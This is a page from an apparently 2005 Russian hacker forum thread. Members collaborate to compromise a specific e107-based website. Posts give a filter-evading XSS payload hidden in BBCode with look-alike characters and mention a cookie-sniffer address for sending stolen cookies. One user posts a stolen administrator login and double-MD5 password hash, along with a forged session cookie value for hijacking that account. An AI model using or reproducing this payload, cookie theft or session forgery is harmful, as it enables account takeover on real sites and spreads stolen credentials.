ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу движок от http://www.e107.ru/
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 09.10.2005, 21:47
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
да нихрена я не сделал...(((
файл images.php у них там поумолчанию уже находился, как я понял ксплойд использует уязвимость в этом файле для того чтобы закачать на сервер свой... Но как сказал Rebz они наверно там права на запись отрубили... поэтому не удлить не закачать скрипт не получится... Хотя можно попробовать в другую директорию им кинуть, вообщем поэксперементировать.
А вообще попробуй лучше XSS времени меньше потратишь: захреначил его и пошёл пивко пить, пишёл хеши собрал пароли нашёл и всё...
ЗЫ: Это конечно в идеале, а на самом деле хз как получится...
 
Ответить с цитированием

  #12  
Старый 09.10.2005, 22:07
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию
тоест ты предлагаешь вот это
##############################
www.ut'
##############################
тока ничего не получается
я когда это в подпись вставил то ничего небыло видно однако почумуто была ковычка видимо что то не так ???
ps может их умоломать поставить права 777 мол так сайт лючше работать будет хотя непохоже что админ лопух он одминит по крайне мене еще 5 сайтов в том числе и сайт http://www.e107.ru/
 
Ответить с цитированием

  #13  
Старый 09.10.2005, 23:06
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
[cоlor=#EFEFEF][иrl]www.ut[иrl=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=alert();this.sss=null`style='font-size:0;][/иrl][/url]'[/cоlor]

У меня всё работает.... Действуй! токо перепиши, я там "о" русскую поставил и "и" заместо "u"
 
Ответить с цитированием

  #14  
Старый 10.10.2005, 01:43
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
Мда... какой-то сраненький форум....
Я тут 5 дней уже Ipb ломаю там ася у чела как у меня мобильный - ну очень хочется...
А тут за 2 часа всё ясно и понятно
 
Ответить с цитированием

  #15  
Старый 10.10.2005, 08:29
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию
Kond4r так надо еще поломать а потом уже ... =)
а насчет си давай это хорошее дело =)
 
Ответить с цитированием

  #16  
Старый 10.10.2005, 08:34
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию
подожди подожди а где www.antichat.ru/cgi-bin/s.jpg ???? куда куки пойдут ...
 
Ответить с цитированием

  #17  
Старый 10.10.2005, 12:20
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
login: neo
id: 1
hash:55994831ef1efc93f541e94bf84fd1cd

ТОКО ТАМ $HASH=MD5(MD5($PASS))
Последний раз редактировалось Kond4r; 10.10.2005 в 12:41..
 
Ответить с цитированием

  #18  
Старый 10.10.2005, 14:57
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
Либо: в куках пропиши:

rcookie=1.55994831ef1efc93f541e94bf84fd1cd
 
Ответить с цитированием

  #19  
Старый 11.10.2005, 23:15
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию
Kond4r Молоца !!!
Как хеши раздобыл, с помошью xss ? Исходник который ты использовал можешь привести(полный)?
ps этот "neo" радиcт-шифровщик какой-то, его MD5 хеш бруту не поддается, буду в куки пихать...
 
Ответить с цитированием

  #20  
Старый 12.10.2005, 00:23
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию
это двойной хэш... так просто его не подберёшь...
Да ХSS. А исходник тот который Rebz дал, я там токо адрес снифера сменил на свой...
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Движок сайта МГПИ - спёкся! n4r0$ Болталка 6 27.03.2009 11:43
Что это за движок? azeri_hacker Болталка 10 11.07.2005 18:43
Суперпупер движок [CH]P] Болталка 0 17.04.2005 23:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ